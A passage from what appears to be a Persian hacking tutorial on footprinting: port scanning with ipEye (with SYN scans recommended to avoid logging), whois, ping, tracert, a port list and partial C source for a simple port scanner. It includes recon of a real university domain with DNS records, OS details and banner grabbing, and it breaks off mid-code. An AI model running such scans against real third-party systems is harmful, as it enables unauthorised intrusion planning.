بايد بررسی شود. معمول‌ترين Scanning ها کدامند؟ دو نوع معمول Scanning وجود دارد: ۱- IP Scanning : فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و می‌خواهيد بدانيد که در اين لحظه کدام‌ها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه‌ همه را. اين موضوع را بعدا توضيح می‌دم ( اين کار معمولا موقعی پيش می‌آيد که قرار است کلاينت هک کنيد و مهم نيست چه کسی باشد ) ۲- Port Scanning : در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده‌ايم و حالا می‌خواهيم بدانيم که کدام پورت‌ها روی آن کامپيوترها باز است. اين کار به کمک نرم‌افزارهای خاصی انجام می‌شود که مبحث امروز ماست. چگونه يک ارتباط TCP برقرار می‌شود که بگوييم فلان پورت باز است يا نه؟ برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCPs 3-way handshakeمی‌گويند: ۱- اول کامپيوتر ما به سمت سرور يک SYN packet می‌فرستد که به معنی درخواست اتصال است. ۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می‌فرستد. ۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می‌فرستد. نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا می‌تواند ما را رديابی کنند، به جای آن می‌توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است. انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan چگونه می‌توان عمل Port scanning را انجام داد؟ در تمام مطالبی که تا اين مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهای موجود در ويندوز استفاده کنم و هيچ ابزار ديگری به‌کار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين‌ کار نيست، به‌ناچار بايد يک سری برنامه را از اينترنت داون‌لود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزده‌ام و سعی می‌کنم فعلا هيچ بحثی را در مورد آن مطرح نکنم) برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شده‌اند، اما مهم‌ترين پورت اسکنرها برای ويندوز عبارتند از: ۱- نرم‌افزار NMapWin v1.3.0 : نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می‌شود). nmap از کامل‌ترين ابزارهايی است که هکر‌ها استفاده می‌کنند که علاوه بر توانايی انواع پورت اسکنينگ‌ها، می‌تواند کارهای بسياری چون تشخيص سيستم‌عامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش‌ از حد کامله ;-) ۲- NetScanTools Pro 2000 : اين هم از بهترين‌هاست ولی چون پولی است به‌ جای داون‌لود بايد در CD هايی که در بازار هست پيدايش کنيد. ۳- WinScan : برای اسکن کردن TCP (ونه UDP) می‌توانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد. ۴- ipEye v1.2 : من در این درس از اين نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانيد به سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] مراجعه کنيد يا مستقيما با کليک روی اين لينک آن را داون‌لود کنيد. لازم است بگويم که اين نرم‌افزار فقط در ويندوز ۲۰۰۰ و xp کار می‌کند و نيز در يک بار اجرا فقط يک ip را می‌تواند تست کند. ضمنا فقط TCP را تست می‌کند. چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟ با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود: ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] Error: Too few parameters. Usage: ipEye -p [optional parameters] ipEye -p [optional parameters] is one of the following: -syn = SYN scan -fin = FIN scan -null = Null scan -xmas = Xmas scan>br> (note: FIN, Null and Xmas scans dont work against Windows systems. [optional parameters] are selected from the following: -sip = source IP for the scan -sp = source port for the scan -d = delay between scanned ports in milliseconds (default set to 750 ms) فرض کنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی می‌کنيم: ipeye 63.148.227.65 -syn -p 1 200 دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم: ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 1-20 [drop] 21 [open] 22 [closed or reject] 23-24 [drop] 25 [open] 26-52 [drop] 53 [open] 54-79 [drop] 80 [open] 81-109 [drop] 110 [open] 111-142 [drop] 143 [open] 144-200 [drop] 201-65535 [not scanned] Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز. در مورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمام پورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود و يه‌کم صبر می‌خواد. ادامه بحث whois قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه می‌دم. در درس قبلی از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، می‌دانيد که برای يک سری از domain (دامنه) ها، جواب نمی‌دهد. مثال آن سايت‌هايی است که دارای دامنه جغرافيايی مثلا ايران هستند، در مورد دامنه‌های جغرافيايی ايران بايد گفت که به ir. ختم می‌شوند ( مثلا: neda.net.ir ). مثال ديگری که در whois سايت SamSpade کار نمی‌کند، تعدادی از دامنه‌های org , .net , .com. هستند که در internic.net ثبت نشده‌اند، بلکه در domainpeople.com ثبت شده‌اند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايی که در گروه org, net, com بودند، مختص به internic.net بود ولی الان ديگر اينطور نيست. کاری که شما بايد برای whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکی از سايت‌های زير استفاده کنيد : ۱- internic.net : برای edu , org , net , com عالی است. برای museum , int , info , coop , biz , arpa, aero هم‌ می‌تواند استفاده شود. صفحه وب مربوطه عبارت‌ است از [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] يا می‌توانيد مستقيما در مرورگر بنويسيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) که به‌جای xxxxxxxx مثلا بايد بنويسيد: far30.com ۲- nic.ir : برای ir استفاده می‌شود. صفحه وب مربوطه عبارت‌ است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ۳- [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) : برای cc , info , biz , tv عالی است. صفحه وب مربوطه عبارت‌ است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] يا می‌توانيد مستقيما در مرورگر بنويسيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) که اگر بخواهم مثلا ----.tv را whois کنم به‌جای yyyyy بايد بنويسيد ---- و به جای zzzz بايد بنويسيد tv ۴- domainpeople.com : برای name , biz , info , org , net , com عالی است. صفحه وب مربوطه عبارت‌ است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] همانطور که ملاحظه می‌فرماييد، org , net , com در ۱ و ۴ مشترک است. علت آن است که بعضی‌ها در اولی و بعضی‌ها در چهارمی ثبت می‌شوند ولی برای whois کردن فرقی نمی‌کنه که شما از اولی استفاده کنيد يا چهارمی چون همديگر رو ساپورت می‌کنند. ping چيست ؟ ping دستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آن را می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است. کاربرد اين دستور به صورت زير است: ping ip-or-domain که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم. مثلا ping prdev.com را در command prompt تايپ کردم و به نتايج زير رسيدم : Pinging prdev.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105 Reply from 63.148.227.65: bytes=32 time=941ms TTL=105 Reply from 63.148.227.65: bytes=32 time=981ms TTL=105 Reply from 63.148.227.65: bytes=32 time=851ms TTL=105 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 851ms, Maximum = 1402ms, Average = 1043ms اين نتايج نشان می‌دهد که prdev.com فعال است. حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان prdev.com است)، ping می‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم : Pinging 63.148.227.65 with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=861ms TTL=105 Reply from 63.148.227.65: bytes=32 time=852ms TTL=105 Reply from 63.148.227.65: bytes=32 time=851ms TTL=105 Reply from 63.148.227.65: bytes=32 time=881ms TTL=105 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 851ms, Maximum = 881ms, Average = 861ms فرض کنيد که به يک ip که فعال نيست، ping کنيم: Pinging 217.66.196.1 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 217.66.196.1: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms که نشان می‌دهد که آن ip در آن لحظه فعال نيست. البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است. tracert چيست ؟ tracert ( در يونيکس می‌شود traceroute ) ابزاری است که نشان می‌دهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی می‌کند و از چه کامپيوترهايی می‌گذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص می‌کنيم و معمولا همان کامپيوتری است که داريم footprinting می‌کنيم. کاربرد اين دستور به صورت زير است: tracert ip-or-domain مثلا می‌خواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به prdev.com برسيم. برای اينکار می‌توان از يکی از دستورهای زير استفاده کرد: tracert prdev.com tracert 63.148.227.65 به نتيجه زير رسيدم: Tracing route to prdev.com [63.148.227.65] over a maximum of 30 hops: 1 160 ms 160 ms 160 ms 217.218.84.3 2 381 ms 691 ms 1772 ms 217.218.84.5 3 * * 2324 ms 217.218.77.1 4 201 ms 1101 ms 180 ms 217.218.0.252 5 341 ms 220 ms 180 ms 217.218.0.2 6 1993 ms 180 ms 181 ms 217.218.158.41 7 180 ms 160 ms 160 ms 195.146.63.101 8 2824 ms * * 195.146.32.134 9 1472 ms 1463 ms 871 ms 195.146.33.73 10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161] 11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77] 12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245] 13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134] 14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174] 15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62] 16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33] 17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205] 18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197] 19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210] 20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94] 21 852 ms * 882 ms 64.156.25.74 22 961 ms 942 ms 841 ms 63.148.227.65 Trace complete. اين نتايج نشان می‌دهد که بايد از ۲۲ کامپيوتر بگذرم تا به prdev.com برسم. اين اطلاعات همان‌طور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروال‌ها و ... است. (بعضی سطرها رو کوتاه کردم و به‌جاش .... گذاشتم) tracert دارای تعدادی switch است که دوتاش رو توضيح می‌دم: d- == > با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده می‌شود. مثلا می‌نويسيم: tracert prdev.com -d h max-hops- ==> حداکثر تعداد گام‌ها را تعيين می‌کند. حالت پيش‌فرض ۳۰ است. مثلا می‌نويسيم: tracert prdev.com -h 50 از اين دستور بعدا بسيار استفاده خواهيم کرد. تکميل ليست پورت‌ها قبلا در مورد مهمترين پورت‌ها صحبت کردم. حالا يک ليست کامل‌تر را در اين درس مي‌گم. اگر مي‌خواهيد يک مرجع نسبتا کامل براي مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد این درس و نيز لينک بالا هيچ بحثي در مورد تروجان‌ها نمي‌کند زيرا تروجان‌هاي شناخته شده هم يک سري پورت پيش‌فرض دارند که در جاي خود بحث خواهد شد. Ports TCP/UDP Service or Application ------ ------- ---------------------------------------- 7 tcp echo 11 tcp systat 19 tcp chargen 21 tcp ftp-data 22 tcp ssh 23 tcp telnet 25 tcp smtp 42 tcp nameserver 43 tcp whois 49 udp tacacs 53 udp dns-lookup 53 tcp dns-zone 66 tcp oracle-sqlnet 69 udp tftp 79 tcp finger 80 tcp http 81 tcp alternative for http 88 tcp kerberos or alternative for http 109 tcp pop2 110 tcp pop3 111 tcp sunrpc 118 tcp sqlserv 119 tcp nntp 135 tcp ntrpc-or-dec 139 tcp netbios 143 tcp imap 161 udp snmp 162 udp snmp-trap 179 tcp bgp 256 tcp snmp-checkpoint 389 tcp ldap 396 tcp netware-ip 407 tcp timbuktu 443 tcp [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 445 tcp ms-smb-alternate 445 udp ms-smb-alternate 500 udp ipsec-internet-key-exchange (ike) 513 tcp rlogin 513 udp rwho 514 tcp rshell 514 udp syslog 515 tcp printer 515 udp printer 520 udp router 524 tcp netware-ncp 799 tcp remotely possible 1080 tcp socks 1313 tcp bmc-patrol-db 1352 tcp notes 1433 tcp ms-sql 1494 tcp citrix 1498 tcp sybase-sql-anywhere 1524 tcp ingres-lock 1525 tcp oracle-srv 1527 tcp oracle-tli 1723 tcp pptp 1745 tcp winsock-proxy 2000 tcp remotely-anywhere 2001 tcp cisco-mgmt 2049 tcp nfs 2301 tcp compaq-web 2447 tcp openview 2998 tcp realsecure 3268 tcp ms-active-dir-global-catalog 3268 udp ms-active-dir-global-catalog 3300 tcp bmc-patrol-agent 3306 tcp mysql 3351 tcp ssql 3389 tcp ms-termserv 4001 tcp cisco-mgmt 4045 tcp nfs-lockd 5631 tcp pcanywhere 5800 tcp vnc 6000 tcp xwindows 6001 tcp cisco-mgmt 6549 tcp apc 6667 tcp irc 8000 tcp web 8001 tcp web 8002 tcp web 8080 tcp web 9001 tcp cisco-xremote 12345 tcp netbus 26000 tcp quake 31337 udp backorifice 32771 tcp rpc-solaris 32780 udp snmp-solaris 43188 tcp reachout 65301 tcp pcanywhere-def ادامه بحث telnet telnet هم جزو مواردي است که در footprinting مورد استفاده قرار مي‌گيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روي فلان پورت چه برنامه‌اي فال‌گوش‌ه و version آن چنده. به اين صورت که به يک پورت خاص (که مي‌دانيم روي آن سرور باز است) تلنت مي‌کنيم و بعد مي‌بينيم که نتايجي ظاهر مي‌شود که نشان‌دهنده اطلاعاتي‌ است که به‌کار مي‌رود. گاهي با مکثي طولاني مواجه مي‌شويم و هيچ چيزي نمايش داده نمي‌شود، در اين حالت يکي دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را مي‌زنيم و خارج مي‌شويم. در مثال پايين جمع‌بندي مواردي که تا حالا از footprinting گفته‌ام را مي‌آورم. جمع‌بندي مطالب گفته شده و بررسي يک سايت فرض کنيد مي‌خواهيم در مورد [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) اطلاعاتي کسب کنيم : ◊ اول به سايت پينگ مي‌کنم و ip آن را به‌دست مي‌آورم: 194.225.184.15 ◊ به کمک ip که به‌دست آورديم، به کمک يک پورت اسکنر پورت‌ها را بررسي مي‌کنيم و مي‌بينيم که پورت‌هايي مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است. ◊ چون domain به ir ختم مي‌شود، براي whois کردن از whois.nic.ir استفاده مي‌کنم و Name Server آن را به دست مي‌آورم که 194.225.184.20 است. ◊ به کمک اين Name Server ، يک nslookup مي‌کنم و به نتايج زير مي‌رسم: iums.ac.ir. SOA sina.i........0 345600) iums.ac.ir. NS sina.iums.ac.ir iums.ac.ir. NS ns1.nic.ir iums.ac.ir. MX 10 sina.iums.ac.ir smtp.iums.ac.ir. A 195.146.34.181 sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 sina.iums.ac.ir. MX 10 sina.iums.ac.ir sina.iums.ac.ir. A 194.225.184.20 sina.iums.ac.ir. A 195.146.34.181 sun.iums.ac.ir. CNAME sina.iums.ac.ir cisco.iums.ac.ir. CNAME router.iums.ac.ir webmail.iums.ac.ir. A 195.146.34.181 linux.iums.ac.ir. A 194.225.184.19 linux.iums.ac.ir. HINFO Intel-Xeon/800 RedHat-Linux-7.2 mta.iums.ac.ir. A 195.146.34.181 pop3.iums.ac.ir. CNAME sina.iums.ac.ir localhost.iums.ac.ir. A 127.0.0.1 proxy.iums.ac.ir. CNAME arvand.iums.ac.ir [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]). A 195.146.34.180 atrak.iums.ac.ir. A 194.225.184.14 ns1.iums.ac.ir. CNAME sina.iums.ac.ir arvand.iums.ac.ir. A 194.225.184.13 router.iums.ac.ir. A 194.225.184.1 router.iums.ac.ir. HINFO Cisco3640/Access-Server IOS-IP-12.0 iums.ac.ir. SOA sina.iu.......3456000 345600) تک تک سطرهاي اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت مي‌کنم که براي مشخص تر بودن در بالا به صورت کمي فرورفته‌تر نوشتم. مثلا: sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 HIFNO براي تعيين نوع کامپيوتر و سيستم‌عامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده مي‌کند. ◊ چون پورت‌هاي باز را هم توسط پورت اسکنر به دست آورده‌ام به آنها تلنت مي‌کنم با دستور: telnet [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) portnum نتايج حاصل از بعضي را مي‌بينيد: 25 : ... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220 پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده مي‌کند. 110 : .OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+ پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده مي‌کند. 119 : NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed و ... يادآوری قبلا گفتم که برای اينکه هکر خوبی بشيد، زبان C را بايد ياد بگيريد. امروز اولين برنامه اينترنتی خود را به زبان C شروع می‌کنيم.برنامه‌ای که امروز می‌نويسيم، يک پورت اسکنر ساده (Simple Port Scanner) است که acw_spscan.exe نام دارد. acw يعنی Artawill Commandline Windows و spscan يعنی Simple Port Scanner. من سورس اين برنامه را با Borland C++ 5.02 کامپايل کردم ولی فکر کنم روی هر نوع کامپايلر C ويندوز کار کند. يک سری نکات در مورد هر برنامه‌ای که با C برای ويندوز خواهم نوشت هست که فقط امروز می‌گم و بعدا ديگه اشاره نخواهم کرد. ۱- هر برنامه‌ای که من می‌نويسم، شامل دو فايل است که بايد داون‌لود کنيد: فايل اصلی که پسوند C يا CPP دارد و يک فايل به يکی از نامهای acw_sock.h يا agw_sock.h يا acu_sock.h ويا axu_sock.h که با توجه به نوع سيستم‌عامل (ويندوز يا يونيکس) و نوع ظاهر برنامه (خط‌ فرمان يا گرافيکی) يکی از اين چهارتا خواهد بود. اگر برنامه برای ويندوز نوشته شده است، بايد قبل از کامپايل نهايی فايل WS2_32.LIB را هم به پروژه اضافه کنيد. ۲- هر بار که برنامه جديدی خواهم نوشت فايلی که پسوند h دارد، کامل و کامل‌تر می‌شود، پس هر وقت يک فايل جديد C يا CPP داون‌لود می‌کنيد، فايل h مربوطه را هم داون‌لود کنيد. ۳- کامپايلر مورد استفاده در برنامه‌های ويندوز Borland C++ 5.02 است. اگر از کامپايلر ديگری استفاده می‌کنيد، ممکن است لازم باشد که تغييراتی اعمال کنيد. ۴- سورس تمام توابع و برنامه‌ها مشمول کپی‌ رايت است ولی استفاده از توابع در برنامه‌هايتان در صورت عدم اعمال تغييرات در سورس بلامانع است. درباره برنامه Artawill Command-prompt Windows - Simple Prot Scanner = acw_spscan برنامه acw_spscan.exe عمل پورت اسکنينگ را به صورت tcp و udp انجام می‌دهد. همانطوری که از نامش پيداست، برای ويندوز و به‌صورت خط فرمان عمل می‌کند. اگر در command prompt تايپ کنيد: acw_spscan ،خطوط زير چاپ می‌شود: Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0 Programmed by Araz Samadi, ArtaWill.com Usage: acw_spscan [] بنابراين مثلا اگر بخواهم سايت پی آر دو را (که ip آن 63.148.227.65 است) برای پورت‌های ۲۰ تا ۳۰ به صورت tcp اسکن کنم، بايد بنويسم: acw_spscan 63.148.227.65 20 30 tcp و جواب می‌شنوم: Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0 Programmed by Araz Samadi, ArtaWill.com >TCP [63.148.227.65] TCP 21 : OPEN [63.148.227.65] TCP 25 : OPEN Simple Port Scanner End. که نشان می‌دهد، پورت‌های ۲۱ و ۲۵ باز است. بررسی سورس برنامه من برای راحتی کار برنامه‌نويسی شبکه، يک سری تابع تعريف کرده و آنها را در فايل acw_sock.h قرار داده‌ام که در برنامه اصلی آن را include می‌کنم. حال به بررسی توابع مورد استفاده در برنامه امروز می‌پردازم ( اگر خواهان اطلاعات بيشتری هستيد، سورس اين توابع را از فايل acw_sock.h بخوانيد ): ۱- (int arta_win_LoadWinsock(char, char ==> در برنامه‌نويسی ويندوز قبل از استفاده از سوکت(socket)، بايد WinSock را لود کرد که من اين کار را با اين تابع انجام می‌دهم. اگر بپرسيد سوکت چيست، می‌گويم سوکت ارتباطی است از نوع TCP/IP که از پورت خاصی از يک کامپيوتر به سوی يک پورت خاص از يک کامپيوتر ديگر برای رد و بدل کردن داده‌ها ايجاد می‌شود. کل برنامه‌نويسی شبکه به کمک C با استفاده از سوکت‌هاست. if(arta_win_LoadWinsock(2,0)==-1) arta_commandline_win_DieWithError("ERR: Cannot load WinSock!"); دو خط بالا برای لودکردن WinSock ورژن 2.0 به‌کار می‌رود. ۲- (void arta_win_CleanWinsock(void ==> در آخر برنامه بايد WinSockی را که با دستور بالا ايجاد کرده‌ايم، به‌کمک دستور اين قسمت ببنديم: arta_win_CleanWinsock(); ۳- (int arta_win_CreateTcpSocket(void ==> اين تابع يک سوکت از نوع tcp ايجاد می‌کند. if((sock=arta_win_CreateTcpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Create Socket!"); دو خط بالا برای ايجاد يک سوکت tcp به‌کار می‌رود. ۴- (int arta_win_CreateUdpSocket(void ==> اين تابع يک سوکت از نوع udp ايجاد می‌کند. if((sock=arta_win_CreateUdpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Create Socket!"); دو خط بالا برای ايجاد يک سوکت udp به‌کار می‌رود. ۵- (void arta_win_CloseSocket(int ==> اين تابع، سوکتی را که با يکی از دو دستور بالا ايجاد کرده‌ايم، می‌بندد. arta_win_CloseSocket(sock); ۶- void arta_win_CreateServerAddressStructure (* struct sockaddr_in *, unsigned short, char ) ==> اين تابع اطلاعات لازم برای برقراری اتصال را مانند IP, Port می‌گيرد و در يک structure مخصوص از نوع sockaddr_in قرار می‌دهد. اين structure در توابع بعدی به‌کار می‌رود. arta_win_CreateServerAddressStructure(&addr,port,I P); ۷- (* int arta_win_EstablishTcpSocketConnection(int, struct sockaddr_in ==> اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی tcp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است. if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){ .... } ۸- (* int arta_win_EstablishUdpSocketConnection(int, struct sockaddr_in ==> اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی udp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است. if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){ .... } حالا يک توضيح کلی می‌دم: اولين سطرهای برنامه را بررسی می‌کنم /* An ArtaWill Production - copyright(c) ArtaWill.com */ /* Programmed by: M.E */ /* This Source code and its Functions can be used - but no .... */ /* Funcions source or code can be done ! */ #include /* for printf(), fprintf() */ #include /* for exit() */ #include /* for strings */ #include "acw_sock.h" void main(int argc, char *argv[]) { struct sockaddr_in addr; char *IP; int sock; int port; int startport, endport; int tcp_udp_both=1; arta_commandline_win_StartMessage("SimplePortScann er ......"); if ((argc != 4) && (argc != 5)) /* Test for correct ...... */ { arta_commandline_win_DieWithError("Usage: acw_spscan []\n"); exit(1); } IP = argv[1]; startport = atoi(argv[2]); endport = atoi(argv[3]); if(argc==5){ if(stricmp(argv[4],"udp")==0){tcp_udp_both=2;} else if (stricmp(argv[4],"both")==0){tcp_udp_both=3;} } if(arta_win_LoadWinsock(2,0)==-1) arta_commandline_win_DieWithError("ERR: Cannot load WinSock!"); اوايل برنامه يه‌سری توضيحات بعدش يک سری هدر (header) را include کرده‌ام از جمله acw_sock.h را بعدش main شروع می‌شود و يک سری تعريف متغير داريم که به نوع اين متغير ها دقت کنيد. بعد از روی ورودی خط‌ فرمان، متغير‌ها ست می‌شوند. دو سطر آخر هم يک WinSock لود می‌کند. حالا ادامه: if(tcp_udp_both!=2){ puts(">TCP"); for(port=startport;port<=endport;port++){ printf(" [%s] TCP %5d : Testing... ",IP,port); if((sock=arta_win_CreateTcpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Crea...."); arta_win_CreateServerAddressStructure(&addr,port,I P); if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b.... ...."); } else{ printf("\b\b\b\b\b\b\b\b\b\b\b"); printf("OPEN \n"); } arta_win_CloseSocket(sock); } } اگر قرار باشد که tcp چک شود، اين خطوط اجرا می‌شوند. در اين سطرها يک اتصال tcp خاص بايد ايجاد شود و اگر اين عمل موفق بود، آن پورت باز است. حالا ادامه برنامه: if(tcp_udp_both!=1){ puts(">UDP "); for(port=startport;port<=endport;port++){ printf(" [%s] UDP %5d : Testing... ",IP,port); if((sock=arta_win_CreateUdpSocket())==-1) 